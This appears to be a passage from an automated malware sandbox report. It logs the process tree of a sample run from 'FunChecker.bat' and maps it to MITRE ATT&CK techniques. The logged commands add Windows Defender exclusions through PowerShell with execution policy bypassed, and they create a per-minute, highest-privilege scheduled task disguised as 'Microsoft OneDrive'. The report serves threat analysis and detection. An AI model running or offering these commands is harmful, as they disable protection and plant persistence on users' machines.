    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\system32.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4208
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system32.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2908
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft OneDrive'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3996
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft OneDrive'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4944
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft OneDrive" /tr "C:\Users\Admin\AppData\Roaming\Microsoft OneDrive"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2716
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:652
- - C:\Windows\SysWOW64\chcp.com
    chcp 65001
    3⤵
    PID:496

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery